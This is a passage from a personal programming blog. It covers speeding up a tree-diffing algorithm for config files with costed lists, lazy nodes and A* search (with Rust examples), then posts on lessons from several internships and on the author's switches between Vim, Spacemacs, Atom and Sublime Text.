The first order of business was to discover why the empirical complexity was higher than we thought it should be. My mentor and I tried to come up with a proper analysis of what it should be, but given all the cases and the nested nature of trees there were just too many parameters and we couldn’t come up with anything precise. But, as far as we could tell the complexity of the underlying algorithm should have been about O(n^2*log(n)) in the length of real files.

I could have looked over the implementation carefully to find all the extra unnecessary work, but an easier method was just to use the Linux perf tool to profile it. I knew the work that caused it to be O(n^3) wasn’t at the outer levels of the algorithm, or I would have noticed easily, so it had to be an operation within that would show up in the profiles.

Sure enough, most of the program’s time was spent in the code that computed the length/cost of an s-expression. I had a function that walked a tree and computed its total length, and in the part of the algorithm where I had to choose the lowest-cost move I computed the cost of the entire path from that point, which added an extra O(n) inside the O(n^2) algorithm yielding O(n^3).

In order to fix this, I made sure every cost computation was constant time, which meant I had to construct the cost of a path incrementally as it was constructed, and also not repeatedly walk trees to determine their cost.

I solved this in three steps:

Create a “costed list” type which was a linked list except each item included the cost of the suffix from that point. This had a constant-time prepend operation that just added the cost of the item being prepended to the cost field of the rest of the list.
Modify the Abstract Syntax Tree (AST) data structure to include a cost field on every node, and to use a costed list for children. I also made all the AST builder functions compute the cost of their components by just adding the cost of their overhead with the costs of their child nodes or costed lists. Now both getting the cost of an AST subtree and constructing a node were constant time.
When building the path/diff/result of my algorithm I used a costed list and constructed new :date-switch nodes using the constant-time builder API.
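The costed list from the first step could be sketched like this in Rust. The original was OCaml, so the Rc-based sharing and all the names here are assumptions made for the example.

```rust
use std::rc::Rc;

/// A persistent linked list where every cell caches the total cost of the
/// suffix starting at that cell, so reading a suffix's cost is O(1).
enum CostedList<T> {
    Nil,
    Cons { item: T, cost: usize, rest: Rc<CostedList<T>> },
}

impl<T> CostedList<T> {
    /// Cost of the whole list from this cell onward.
    fn cost(&self) -> usize {
        match self {
            CostedList::Nil => 0,
            CostedList::Cons { cost, .. } => *cost,
        }
    }
}

/// Constant-time prepend: the new cell's cost is the item's cost plus the
/// cached cost of the rest. The tail is shared, not copied.
fn prepend<T>(item: T, item_cost: usize, rest: &Rc<CostedList<T>>) -> Rc<CostedList<T>> {
    Rc::new(CostedList::Cons {
        item,
        cost: item_cost + rest.cost(),
        rest: Rc::clone(rest),
    })
}
```

Two different paths can prepend onto the same tail without copying it, which is the structure sharing that keeps storing a full result per table entry cheap.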

After I did this, our measurements of growth were consistent with the O(n^2*log(n)) we were expecting.

Skipping identical prefixes and suffixes

This was an easy but high-impact optimization I had written down earlier. By the properties of the cost of each move, if a prefix and/or suffix of the two lists was identical, the “same” move would always be the best for those parts of the path. This meant that I could find the longest prefix and suffix of the two lists that were the same and only run the dynamic programming algorithm on the middle part that wasn’t. This made the common case of edits being concentrated at a single point in the file very fast because now the running time was more like O(d^2*log(d)+n) with n being file size (large) and d being the size of the edited region (small).
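A sketch of the trimming step in Rust, with a hypothetical common_affixes helper. It only measures the shared prefix and suffix; the expensive diff would then run on the middle slices.

```rust
/// Return (prefix_len, suffix_len) for the longest common prefix and suffix
/// of two lists. Only old[prefix_len..old.len() - suffix_len] and the
/// corresponding middle of `new` still need the expensive diff.
fn common_affixes<T: PartialEq>(old: &[T], new: &[T]) -> (usize, usize) {
    let prefix = old.iter().zip(new).take_while(|(a, b)| a == b).count();
    // Don't let the suffix overlap the prefix we already matched.
    let max_suffix = old.len().min(new.len()) - prefix;
    let suffix = old
        .iter()
        .rev()
        .zip(new.iter().rev())
        .take(max_suffix)
        .take_while(|(a, b)| a == b)
        .count();
    (prefix, suffix)
}
```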

Now almost all common uses of the tool would return instantly except edits in multiple places spread out through a large file. It was now a pretty useful tool, but users having to know which cases to avoid to make the tool not take forever wasn’t great. It would sometimes be used in high-pressure situations and often people did want to make edits in different places. Manually batching the edits up and running the tool multiple times wasn’t ideal.

There was also only one or two weeks left in my internship, not much time to do another project, and I think my mentor was having fun challenging me to make the tool perfect and brainstorming how to do so with me. I was also enjoying the process, so the optimization would continue until performance improved!

Tree creation optimization

Profiling indicated a lot of time was spent creating :date-switch AST nodes.

First I wrote a fast-path method of creating and computing cost for the :date-switch blocks the algorithm creates, since they use a simpler format and a known indentation style compared to what the more general AST builder handles.

Additionally, when exploring paths in the “inside :date-switch” table, I used to create a :date-switch node whenever I needed to know the cost so far to decide between moves. Instead, I switched to just adding the costs of the insert and delete branches (which were costed lists), to a known overhead of the :date-switch block. I only created the full node upon exiting to the “outside :date-switch” table.

But my mentor realized this could extend even further: the search for the best path only ever needs to know the cost of a resulting path/tree, and we only need the full tree for the best path at the end of the search. So I added a “lazy :date-switch” AST node that has a stored cost computed by fast addition of the cost of the components plus a known overhead, but doesn’t actually create the node immediately and just stores an OCaml lazy thunk that creates it if we try to serialize the result.
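The idea can be sketched in Rust with a node that stores its cost eagerly and a closure that builds the text on demand. This is only an illustration: the names, the single-line format and the fixed date are assumptions, and unlike an OCaml lazy value this closure rebuilds the text on every call rather than caching it.

```rust
/// A node whose cost is known up front but whose text is only built on demand.
struct LazySwitch {
    cost: usize,
    build: Box<dyn Fn() -> String>,
}

/// Hypothetical fixed overhead: the characters of the wrapper itself.
const SWITCH_OVERHEAD: usize = "(:date-switch (case 2017-04-07 ) (else ))".len();

fn lazy_switch(new_branch: String, old_branch: String) -> LazySwitch {
    LazySwitch {
        // Constant-time cost: add the branch sizes to the known overhead.
        cost: SWITCH_OVERHEAD + new_branch.len() + old_branch.len(),
        // The string building is deferred until someone asks for it.
        build: Box::new(move || {
            format!("(:date-switch (case 2017-04-07 {}) (else {}))", new_branch, old_branch)
        }),
    }
}
```

The search can compare the cost field of many candidate nodes and only call build on the ones that end up in the best path.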

More?

My tool was now instant in most common cases and difficult cases were over 100x faster. But, on the very largest 10,000+ line config files it would still take up to 5 minutes in the worst case if you made edits in multiple places. There were no longer any obvious hot spots in the profiles, so I needed algorithmic improvements that let me search fewer possible paths.

I looked at my list of optimization ideas and there was only one left, which I had written down early on in the process when thinking about the correspondence between dynamic programming and path finding on a grid. It was just a few characters in a Markdown note that I had saved for if I was feeling ambitious and really needed it: “A*”.

Path Finding

Back when I was designing the algorithm by thinking about it as a path finding problem, I thought “hey wait, if this is a path finding problem, why not use an actual path finding algorithm?” The first thing I realized is that the memoized recursion approach I was planning on taking was just a depth first search, which can be a path finding algorithm, but not a particularly good one.

Could I use a better path finding algorithm? Breadth first search wouldn’t help much since the goal was near the maximum distance in bounds. However, A*, perhaps the most famous path finding algorithm, seemed like it might help, if only I could come up with a good heuristic. So I wrote it down without thinking too much and came back to it later after I had done all my other optimizations.

The last time I learned A* was when I read Algorithms in a Nutshell (good book) years ago and all I remembered was that it needed a priority queue and a good heuristic. I had a Heap for the priority queue, but I didn’t remember how to actually implement the algorithm or what made a good heuristic, so to Wikipedia I went!

I learned that I needed a heuristic that never overestimated the remaining cost, and that ideally never decreased more than the cost of any move taken. One thing that satisfies those properties is the maximum of the costs of the two list suffixes from a location. This corresponds to the notion that a scoped config file that includes the contents of both config files can’t be smaller than either of the input files. This heuristic was easy to compute using the costed list representation I already had, which already has the cost of each suffix of the input lists.
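As a rough Rust sketch of that heuristic, assume each input list is summarized by the per-item costs of its elements. The function names are hypothetical, and the suffix-cost arrays stand in for the costed lists described earlier.

```rust
/// suffix[i] is the total cost of items[i..]; the final entry is 0.
fn suffix_costs(item_costs: &[usize]) -> Vec<usize> {
    let mut out = vec![0; item_costs.len() + 1];
    for i in (0..item_costs.len()).rev() {
        out[i] = item_costs[i] + out[i + 1];
    }
    out
}

/// Lower bound on the remaining output size from grid position (i, j):
/// the result has to contain at least the larger of the two remaining inputs.
fn remaining_cost_bound(old_suffix: &[usize], new_suffix: &[usize], i: usize, j: usize) -> usize {
    old_suffix[i].max(new_suffix[j])
}
```

Both lookups are constant time once the suffix costs exist, so the heuristic adds almost nothing to the cost of expanding a state.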

With a heuristic and an understanding of A* in hand, I refactored the implementation of my algorithm to work by putting successor states in a priority queue based on their cost plus the heuristic remaining cost. This required changing each instance of recursion on my table into the creation of a State structure that encompassed if I was inside or outside of a :date-switch, and the current position.

I also had to make two changes to my data structures. First, since I was no longer using recursion to destructure my linked lists but was now indexing them, which is O(n), I created arrays of the tails of my input costed lists so that random access was fast. Next, my solution still used O(n^2) memory in all cases due to the 2D array memoization table, so I switched that to a hash table from position tuples.

Profiling now showed a lot of time was spent in hash table lookups, so I experimented with dynamically using a 2D array for small input lists (like those often found on the lower levels of the tree) and a hash table for larger input lists, but further profiling showed it didn’t increase performance much, probably because most of the lookups were in the larger lists, so I stuck with plain hash tables.

After a little debugging of off-by-one errors, I ran the program on my largest test case and it finished instantly. It was so fast I was suspicious it was broken and just skipping all the work, but sure enough it worked perfectly in every case I threw at it. The cost was something like O(n * log(n) * e^2) where n is the file size and e is the number of edits. My mentor and I managed to think of some edge case trees where it might revert to O(n^2) behavior, and it still only scaled to config files of tens of thousands of lines rather than hundreds of thousands, but it was nearly instant for all cases that might actually occur, so it was good enough™.

I spent the remaining 3 days of my internship polishing up the user interface of the tool, cleaning up the code and writing lots of doc comments explaining my algorithm. I also gave a presentation to a bunch of the other engineers telling a shorter version of the story I’ve written here. That marked the end of my internship with Jane Street and one of the most interesting algorithmic problems I’ve ever worked on, despite it being part of a tool for editing configuration files.

Example Implementation

I was curious about how the approach of turning a dynamic programming problem into an A* path finding problem scaled and how applicable it was to other problems. So, I developed an example implementation of this approach in Rust for the sequence alignment problem, which Levenshtein distance is a specific instance of. It’s structured for simplicity and I haven’t optimized it at all, but it’s good enough to demonstrate the asymptotic improvements.

The core code of the algorithm is fairly simple and is a good demonstration of the logic required to turn a dynamic programming algorithm into an A* path finding instance. It allows you to tune the weights of insertions/deletions, mismatches and matches of characters in the two strings, so that you can change it to be Levenshtein distance or some other instance of sequence alignment.

The heuristic it uses is based on splitting the remaining distance to the bottom right corner into two components: the minimum number of insertion/deletion moves necessary to get on the diagonal from the goal, and the minimum number of match moves necessary to get from that place on the diagonal to the goal. This represents the minimum possible cost required to reach the goal from any position without knowing what the actual best path is.

fn diag(pos: &Pos) -> i32 {
    (pos.1 as i32) - (pos.0 as i32)
}

fn heuristic(pos: &Pos, goal: &Pos) -> Score {
    // find the distance to the diagonal the goal is on
    let goal_diag = diag(goal);
    let our_diag = diag(pos);
    let indel_dist = (our_diag - goal_diag).abs();
    // find the distance left after moving to the diagonal
    let total_dist = max(goal.0 - pos.0, goal.1 - pos.1) as i32;
    let match_dist = total_dist - indel_dist;
    return (indel_dist * INDEL) + (match_dist * MATCH);
}
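To show how a heuristic like this plugs into a search loop, here’s a self-contained sketch of A* over the alignment grid. It is not the code from my example implementation: it only has insert, delete and match moves (no mismatch move), the INDEL and MATCH weights are placeholder values, and the heuristic is only a valid lower bound while MATCH is at most twice INDEL.

```rust
use std::cmp::Reverse;
use std::collections::{BinaryHeap, HashMap};

type Pos = (usize, usize);

// Placeholder weights; with these the result is the insert/delete-only
// edit distance.
const INDEL: i32 = 1;
const MATCH: i32 = 0;

/// Lower bound on the cost from `pos` to `goal`: indels to reach the goal's
/// diagonal, then matches along it.
fn heuristic(pos: Pos, goal: Pos) -> i32 {
    let diag = |p: Pos| p.1 as i32 - p.0 as i32;
    let indel_dist = (diag(pos) - diag(goal)).abs();
    let total_dist = (goal.0 - pos.0).max(goal.1 - pos.1) as i32;
    indel_dist * INDEL + (total_dist - indel_dist) * MATCH
}

/// A* over the alignment grid. Returns the cheapest cost and the number of
/// states that were expanded.
fn astar_align(old: &[u8], new: &[u8]) -> (i32, usize) {
    let goal: Pos = (old.len(), new.len());
    let start: Pos = (0, 0);
    // Cheapest known cost to reach each visited position (a sparse table).
    let mut best: HashMap<Pos, i32> = HashMap::new();
    // Min-heap ordered by (cost so far + heuristic), via Reverse.
    let mut queue = BinaryHeap::new();
    best.insert(start, 0);
    queue.push(Reverse((heuristic(start, goal), 0, start)));
    let mut expanded = 0;
    while let Some(Reverse((_, cost, pos))) = queue.pop() {
        if cost > best[&pos] {
            continue; // stale queue entry; a cheaper route was found later
        }
        if pos == goal {
            return (cost, expanded);
        }
        expanded += 1;
        let (i, j) = pos;
        let mut moves: Vec<(Pos, i32)> = Vec::with_capacity(3);
        if i < goal.0 {
            moves.push(((i + 1, j), INDEL)); // delete old[i]
        }
        if j < goal.1 {
            moves.push(((i, j + 1), INDEL)); // insert new[j]
        }
        if i < goal.0 && j < goal.1 && old[i] == new[j] {
            moves.push(((i + 1, j + 1), MATCH)); // same
        }
        for (next, step) in moves {
            let next_cost = cost + step;
            if best.get(&next).map_or(true, |&known| next_cost < known) {
                best.insert(next, next_cost);
                queue.push(Reverse((next_cost + heuristic(next, goal), next_cost, next)));
            }
        }
    }
    unreachable!("the goal is always reachable using only inserts and deletes")
}
```

The second return value makes it easy to compare how many states get expanded against the full (old.len() + 1) * (new.len() + 1) grid.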

Discoveries

Here’s some things I learned by fiddling with the program and timing it:

As expected, the algorithm only tends to explore states along the diagonal of the grid, with the width of the area explored proportional to the edit distance. This suggests the running time is something like O((a+b) * e^2) where a and b are the input lengths and e is the edit distance.
Running it on a 10,000 base pair gene sequence with an edit distance of 107 takes 0.26 seconds.
Running it on a 10 megabyte random text file with 1 edit near the beginning and 2 near the end takes 20 seconds and evaluates 40 million states. With the naive O(n^2) algorithm, just allocating and zeroing the 4*10^14 bytes of memory for the table would take forever, which demonstrates that this optimization does in fact provide an asymptotic speed up.
It’s still way slower than specialized sequence alignment implementations like Edlib, probably asymptotically so. These implementations use all sorts of fancy tricks including fancy algorithmic tricks, SIMD and bit vectors to eke out maximum performance for bioinformatics applications. My implementation is at least way way simpler.
Plain Dijkstra’s algorithm (A* with a heuristic always returning 0) actually performs almost as well for Levenshtein distance because only edits have cost, so it explores along the diagonal towards the goal along the path with fewer edits just because those have lower cost. However, if the problem has a cost for matching portions as well (like my original tree diffing problem) Dijkstra’s algorithm will explore in a blob expanding from the top left and be almost as slow as the naive algorithm.
With a heuristic, Levenshtein-distance like instances where only edits have cost take about the same time to run as instances like my tree-diffing problem where matching segments also have cost.

Conclusion

A* is an interesting technique that’s an easy way to accelerate a class of dynamic programming problems. It definitely works on any vaguely diff or edit-distance like problem, but it might extend to even more. If you want absolute peak performance on a simple algorithm there are probably better techniques to use, and I’d start by looking at what bioinformatics people do. But if you just want something easy and flexible this seems like a good technique. It’s not one I’ve seen done before, and Google doesn’t turn up any results. It might even be novel, or it might just be that A* is a hard term to Google for. I’m interested to hear from anybody who’s seen something like this before.

A great place to work, highly recommend. I did get Jane Street’s permission before divulging the algorithm I wrote for them in this post.

Things I've Learned Doing Internships

2017-04-06T00:00:00+00:00

I’m a student at the University of Waterloo, famous for its co-op program where students do six 4-month work terms throughout their degree. I’ve now done 7 internships both within the program and outside it. Doing internships before one graduates is a great way of experiencing lots of different teams, work environments and even cities. This has allowed me to gain a much better idea of what kind of place I want to work after I graduate. Every job has taught me something genuinely new: my model of what factors are important to my enjoyment of a job has totally changed.

In this post I’ll share some of what I learned at each different company, especially the things that surprised me and went against conventional wisdom or practice.

Halogen Software

This was my first job, at a company that makes enterprise Java software for HR departments. Back then I was super enthused to have found a job, but nowadays this is the kind of place many of my friends would avoid just on the sound of it. There’s a meme in Waterloo of “Cali or bust” where students try desperately hard to get jobs in California and are very sad if they have to settle for enterprisey boring-sounding jobs.

The thing is, I enjoyed this job and had fun! My coworkers were great and despite working on software many would judge to be boring I found the work engaging.

At Halogen I learned that even companies that exemplify all the stereotypes of a boring company (Java, B2B, CRUD, cubicles, not in California) can be good enjoyable places to work. Just because your job isn’t at the hottest company in California doesn’t mean it will be miserable.

The Eclipse Foundation

My second job was an unpaid co-op job for credit in high school where I would spend the second half of every school day working. I worked on fixing bugs in the Eclipse IDE off of the bug tracker.

What I learned is that tooling matters a lot. It’s not that the Java tooling I was using allowed me to figure things out faster, it’s what allowed me to do things at all. I could wade in with no experience to a multi-million line code base and fix 11-year-old bugs because the Java and Eclipse tooling was so good. The ability to view references and definitions with total accuracy and to follow things in an excellent debugger was key. An interesting Eclipse-specific feature was that every part of Eclipse was a plugin, so instead of spending hours compiling all of Eclipse, you could download the source for the relevant plugin, load it, then immediately press “Run” and it would start a new instance of Eclipse almost immediately that cloned your copy of Eclipse except for that one plugin. To this day it is the largest project I’ve worked on, but it had a very fast feedback loop and short setup time, which was quite impressive.

Almost all of Java’s faults as a language were made up for by tooling that was leagues better than any other popular language (excepting maybe C#). This job tempered my enthusiasm for how much more productive $AWESOME_LANGUAGE is than languages like Java and C# despite better design and handy features.

Shopify

I worked at Shopify three times: twice during high school summers and once as my first Waterloo co-op job. As such, I learned a fair amount there, but the lessons were sometimes spread out, so I’ve grouped them together.

Transparent and involved executives are fantastic

The CEO of Shopify, Tobi Lütke, is incredibly awesome. He started as the first developer, and he makes sure to stay abreast of the latest developments and will even weigh in on technical strategy if you tag him on GitHub. As an intern it was pretty awesome to sit down on a couch with the CEO and hack on Liquid together. He’s also very transparent and makes sure everything about the company is too. For example, every couple weeks he does a frank AMA where he addresses questions submitted and voted on by employees and does a good job of giving detailed answers and not dodging.

On other Fridays, employees give lightning talks about what they are working on. This is where one story that really exemplifies the difference between a great CEO and a stereotypical one happened: I was giving a short talk about flaws in the Liquid template parser and how it would accept almost anything without a syntax error, and my work in replacing it. My next term I learned that while watching my talk he’d joked to the person next to him “that kid’s got courage”, which clued me in that at most other companies, trash talking code the CEO wrote that powered an important part of the product, in front of the entire company, would’ve been a “career limiting move” to put it lightly. I had talked to Tobi about the parser rewrite before the talk and he was in fact the first one to admit that the parser had issues. He had even bought a book on parsers hoping to fix it himself someday, so I knew I was safe giving the talk. Regardless, it still shows the benefits of having a great transparent CEO who does his best to rid the company of stifling corporate politics.

Good managers make a big difference

Up until my last internship at Shopify I’d had good team leads, supervisors and managers. I recognized that they were important but they didn’t really affect me or my work that much. This sounds like the lead up to a bad manager story, but actually the thing that changed my mind was having a fantastic team lead/manager.

He was dedicated, competent, funny, relentlessly positive, and an excellent advocate for me and the rest of the team. He was also a developer but he spent most of his time being team lead: keeping everything on target, prioritizing, problem solving and making sure we shipped on time.

He had a moderate impact on my productivity: prioritizing, distributing tasks, answering questions and pair programming on difficult tasks. However, he had a tremendous impact on the environment of the team and thus my enjoyment of the job. I learned that having a good manager helps things run smoothly, but having an excellent manager can make a good job great. I hear that having a bad manager can make a good job terrible, but luckily I have yet to experience that (crosses fingers).

If everything else is done right, the task doesn’t matter

The importance of a good manager ties into my next point, which is that on that same team I was working on a CRUD web app, a stereotypically boring task. However, I really enjoyed that job, and through that I learned that when a company gets everything else right it doesn’t matter very much what the actual task is.

When I was working at Shopify the third time, my team was great, my manager was great, the culture was great, the office was great, the tools were great, the language was great, the food was great, the focus on quality was great, the technical decision-making was great. It didn’t matter that I was working on redesigning a web form.

This isn’t to say the task doesn’t matter at all. If the task was actually an unpleasant one and not just a less exciting form of programming, I wouldn’t have enjoyed it nearly as much.

The University of Waterloo HCI Lab

My next term, following my general strategy of trying out as many different jobs as possible, I tried out research despite enjoying my previous job so much. I worked on a system that fused eye tracking, head tracking and sound recognition to provide a hands-free mouse alternative that I could use as quickly as I can a trackpad. I also worked on custom computer vision systems for eye tracking and marker tracking, as well as developing custom audio recognition algorithms. I basically got free rein to work on a side project I had as a job and do exactly the work I wanted and found interesting.

Further learning on project coolness

This switch from working on CRUD web apps to a cool project that I had chosen myself furthered my learning from the previous term. Although I was working on my choice of the most interesting topic and definitely enjoyed the job, I didn’t enjoy it as much as my previous internship at Shopify.

There were two components to this:

First, the magnitude of the difference in how interesting a project sounds doesn’t correspond to the magnitude of the difference in how interesting working on a project is. Working on cool computer vision systems involves a lot of architecture, plumbing, refactoring and debugging. Most of these tasks are the same kind of tasks one does when working on a CRUD web app. Even when I was working on redesigning a web form there were times when I had to go sit away from the computer and think really hard with a notepad about architectural issues and how to design the system in a clean and robust way. Despite massive differences in how interesting they sounded, the computer vision system only involved moderately more interesting difficult problems and slightly less boring plumbing than the CRUD web app.

Secondly, I found that even when I was working on the interesting challenging parts, I enjoyed and valued the challenge and learning, but not as much as I expected to value them before I started the job. The difference in fun was tangible but not as extreme as I had imagined.

Previous to this term I had systematically overvalued the importance of the challenge and interestingness of the task. I also see this a lot when people I know choose jobs: they’ll sacrifice pay, company quality, location choice, team, culture, perks and pretty much everything else if it means they can work on something cool like compilers for machine learning on big data. I did exactly this as well for my research term.

Interestingness of the work is still a significant positive factor when I’m choosing a job, it just no longer overrides all other considerations, it’s more of a factor I use to decide between two good options.

Teams

One part of the difference between working in the lab and working at Shopify was that in the lab I was working alone on my own project. There were other people in the lab that I talked to occasionally but we didn’t really work together or even eat lunch together.

I realized that great coworkers are an important part of why I enjoyed my previous jobs.

Jane Street

For my next internship I worked at Jane Street in London UK. I worked on developer tools, low-latency networking code, rendering huge tables and tree-diffing algorithms, all in OCaml. I had a great time, both with the interesting work and all the other parts of working there.

Interviewing

The first thing that impressed me about Jane Street, because it was before I even started, was how good their interviewing system is. The questions seemed good at testing programming ability rather than algorithm knowledge or flashes of inspiration. They were about thinking hard, puzzling out all the cases and extracting a clean design. I was allowed to use a whiteboard, their laptop, or my own laptop, with any language I wanted. Each interview had two interviewers in the room, I assume for higher judgement reliability for the time spent. There were a reasonable number of interviews packed into one day, and I got an offer a fairly short amount of time after I interviewed.

Later I learned that they have a set of people who specialize in interviewing and do substantially more interviews because they like to and for greater consistency and skill specialization. Each question is well-specified and alpha and beta tested before being used for decision-making. Becoming the lead of the two interviewers for a specific question requires having shadowed someone else who knows it well.

This interview process seems substantially better than any other process that I have heard of (with the possible exception of the Matasano process tptacek on HN talks about, but I haven’t looked into that much). It addresses many of the common criticisms of tech company interviews like algorithm bingo, requiring flashes of inspiration, requiring coding on a whiteboard, poor question design, inexperienced interviewers and lack of inter-rater reliability. It seems like it would have a very low false positive rate, and a lower (though still significant) false negative rate than other interview processes I’ve seen.

Agency

Another thing that impressed me is the level of agency afforded to employees. The management structure was extremely flat, and everyone’s job was basically either “Do what’s best for the company, probably coding” or “Do what’s best for the company, probably trading” with some people in between and a few “… with some managing” thrown in.

For a certain type of company, this seems to work excellently. Competent people know that for decisions with sufficiently high stakes it is a good idea to seek input from others, and expend effort to make the right decision proportional to the stakes. This means there’s little need for explicit policies, procedures and approval chains. That doesn’t mean the value they provide is absent, they just happen whenever they make sense for the task at hand, like ops checklists and working with other people to make big decisions correctly. I was surprised by the extent to which “Do what’s best” gets the benefits of standard corporate practices when helpful, but avoids the pitfalls. I still don’t believe this is broadly applicable though, it needs a certain type of company to work well.

Conclusion

My model of what a good job and an effective company look like has changed significantly since before I started working. Since starting at Waterloo I’ve even precommitted to not doing repeat internships, so as to maximize the variety of jobs, locations, and companies I experience. It’s tempting to return when I have a great time and a job is the best one I’ve ever had, but I remember that the only reason I took that job was that I didn’t return to the previous best job I ever had.

I’m looking forward to further learning at 3 more internships before I graduate, including one in San Francisco at Google this summer. After I graduate, I’ll look hard at all the different jobs I’ve had and will have a good model with which to decide what I want to do next. This will likely be returning to my favourite past company, but I might also use this information to choose a brand new path I’m confident is better.

My Text Editor Journey: Vim, Spacemacs, Atom and Sublime Text

2017-03-04T00:00:00+00:00

I currently use a highly customized Sublime Text 3 as my text editor for almost all programming. However, people are often surprised to learn that I’ve used Vim for 6 months, Emacs/Spacemacs for 10 months (including much elisp hacking) and Atom for a month, yet I still prefer Sublime.

This post explains my journey between text editors, what I learned, what I like and dislike about each of them, and why in the end I’ve chosen Sublime (for now). Most detailed is my reasoning for abandoning Spacemacs, despite being a top contributor and power user, although many of my criticisms of Vim also apply to Spacemacs (and vice versa).

The Early Days: Textmate & Sublime Text 2

My text editor when I first learned programming was Textmate, and I stuck with it for a few years (I forget how many) before I at some point switched to Sublime Text 2’s trial, and then paid for a license.

Back then I only used the basics: syntax highlighting, find/replace, autocomplete, file tree… I didn’t know any keyboard shortcuts besides standard OS ones like copy-paste and undo. I used the mouse for all selection and eventually learned the Sublime command palette and “open file in project” palette.

This setup didn’t cause me any trouble, I was productive and nothing was painful. But, I heard tell of the true power one gained upon learning to use a real editor like Vim or Emacs. I watched screencasts where Vim masters would perform impressive editing operations in a couple keystrokes.

Vim: A Taste of Power

In late 2012 I switched to Vim. I learned the keyboard shortcuts with vimtutor and printed cheat sheets. I read tons of blog articles (often conflicting) on learning and using Vim the right way.

I tried using a blank .vimrc and building pieces from scratch making sure I understood what each piece did each time. However, this was taking far too long, my editor was missing key functionality from Sublime and Textmate like a file tree, good autocomplete, open in project, and support for languages I used. It was also ugly.

So I started using the spf13 Vim distribution. It was nice, and had most of the features I wanted. You can still find my modified spf13-based vimrc here.

I was reasonably happy with this setup and continued using it for over 6 months.

However, there were many pain points. One of these was that things often didn’t work. For example, my tab key was bound to tons of different things like autocomplete, snippet expansion, indentation, moving between snippet fields and inserting the literal tab character. Many of those overrode each other in different contexts, but very often it chose the wrong one. I ended up fixing this somewhat but not completely, but I didn’t have this issue in Sublime because everything was designed to work together so the tab key just always did what I wanted. Even after I fixed it, the hours I spent diagnosing the issue, figuring out how to resolve the conflicts, implementing it, then re-learning my muscle memory probably erased weeks of sub-second Vim speed gains.

Another issue I had was that Vim was mouse-hostile. I was fully aware that the Vim philosophy is to just never use the mouse. However, even with plugins like EasyMotion and ideal vim shortcut use the keyboard is slower for some selection tasks like selecting a range of text far from the cursor than the mouse is. Often using Vim shortcuts felt faster because my brain was engaged figuring out the optimal combination of motions and looking for EasyMotion hints, but whenever I timed myself I was consistently much slower than I was with the mouse. I’m only talking about long range selection and cursor movement here, I totally concede that keyboard shortcuts are better for short range movement and selection. Vim wasn’t that bad for the mouse, but lots of plugins didn’t really work well with it and mouse selection often worked weirdly in some states.

Back to Sublime (with a stint in Atom)

I realized that I didn’t like fighting my editor and loved the ease of use and mouse support of Sublime. However, I also loved the power of Vim’s keyboard model. Luckily, I could use Vintageous.

This way I could get all the power I liked about Vim with all the niceties of Sublime.

In fact, Vintageous is arguably more powerful than Vim itself because it works with multiple cursors. Using multiple cursors with Vim bindings is incredible, it’s basically the same power as Vim macros give you, except you can compose them on the fly with instant feedback about what commands did at each place you wanted to use them (see gif below). I found I rarely used macros with Vim because I had to think hard about which commands I could use that would work on every instance and make sure I didn’t screw anything up, then figure out how I wanted to run the macro for each location, but with Sublime it was so easy I did it all the time. Yes, I know both Vim and Emacs have multiple cursor plugins, but they are hacks and don’t seamlessly work with all commands and together with the mouse.

I started using Sublime as a power user’s text editor just like I had used Vim. I learned the keyboard shortcuts, read about the functionality and installed plugins.

For a month I also tried out Atom. I pretty much replicated my Sublime Text setup with the equivalent Atom plugins, plus some extras that only Atom offered. However, I preferred Sublime’s speed. It wasn’t just that some editing operations had a bit of latency, but that Sublime could offer features that Atom couldn’t because of its speed. For example Sublime’s “open in project” panel instantly previews the files as you type because it can load files in milliseconds, and search is incremental by default.

I used this setup quite happily from mid-2013 to late-2014. However, I started thinking about the possibility of using Emacs with evil-mode. I’d heard its Vim emulation was fantastic and the possibility of using Emacs lisp to craft the perfect text editing experience given time was enticing.

I started looking around at various Emacs starter kits like Prelude and tried out a few. I read Emacs articles, documentation and blog posts about people’s Emacs configs. However, everything had really horrible convoluted hard to remember keyboard shortcuts that didn’t fit well with Vim’s.

Spacemacs

Then, I found Spacemacs. It was exactly what I was looking for. It was pretty, integrated Vim and Emacs functionality in an interesting and discoverable way, and promised to have everything set up to work out of the box. Somehow this project only had around 12 stars on Github and no other contributors. It seemed the creator had poured tons of effort into making a fantastic project, but unlike most people’s dotfiles, he put effort and thought into making it adaptable to individual needs and documenting how to do so. I was stunned that this project only had ~20 stars and no other contributors.

So I downloaded it, started working on my own .spacemacs file and joined the Gitter chat the creator had set up. A little while later I submitted the first contribution to the project.

Little did I know at that point that the reason it only had 20 stars was that by chance and lots of Googling I had just stumbled upon it earlier than everyone else. Over the coming weeks I continued tweaking and sending PRs and other early adopters like Diego trickled in to the chat and started contributing.

As I used Spacemacs I often noticed things that worked poorly or not at all. I kept steadily fixing most problems I found and adding new contribution layers for the things I wanted. When I was using Spacemacs for something where I had already fixed most of the bugs, it was quite nice and felt efficient.

I continued using Spacemacs for around 6 months and maintained my position as top contributor for most of that time. I helped newbies out in the Gitter chat, triaged PRs and contributed and maintained a few different layers.

I thoroughly enjoyed contributing to Spacemacs, but nearly everything I contributed was fixing a bug or annoyance I encountered while trying to get something done, often writing the elisp to fix an earlier problem.

Brokenness

These yak-shaving tasks ranged from fixing annoying keybinding conflicts that Sublime Text had built-in logic for, to getting LaTeX support to work. I even wrote a general mechanism for tabbing OSX windows to get around how bad all the Emacs tab/workspace plugins were. I definitely noticed my annoyance but I ignored it since I was having fun and I had hope that things would get better after more work.

However, after six months of making almost no progress on other projects while discovering and fixing bugs and implementing things I missed from other editors, I realized that there might not be an end. Part of the problem is that I love learning new languages and doing different kinds of projects. Other Spacemacs users might make a few fixes here and there for their primary use case, whereas I was stuck adding support for D, Racket, Nim and Rust and then fixing the bugs I exposed when changing my workflow.

I think the underlying reason is that everything in Emacs, and especially Spacemacs, is a hack. Core Emacs offers almost nothing and everything is layered on top as ad-hoc Emacs Lisp additions. Different third-party plugins and to some extent base functionality step on each other’s toes and make conflicting assumptions all the time. One particularly bad example I ran into is my Emacs hanging mysteriously when autocompleting on some two character suffixes. After much searching it turned out to be a known issue where if what I was completing looked like a domain name Emacs would try to ping it because of an interaction between autocompletion, file finding, and remote server support.

Lack of Consistency and Discoverability

Another problem with this pile-of-hacks design is that nothing was consistent or discoverable. Every moment I saved on common operations due to efficient keyboard shortcuts was cancelled out by a minute spent searching for how to do a less common operation that I didn’t do often enough to memorize.

An example of an occasional workflow I can do in Sublime is:

Paste my clipboard into the search box.
Search all files in a project for it without regex support (useful when searching for a string with special characters that you don’t want to escape), case insensitively.
Narrow it down to a glob of certain files without re-typing my query.
Edit my query slightly to refine the results, again without re-typing it.
Replace the content of all those occurrences once satisfied.
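
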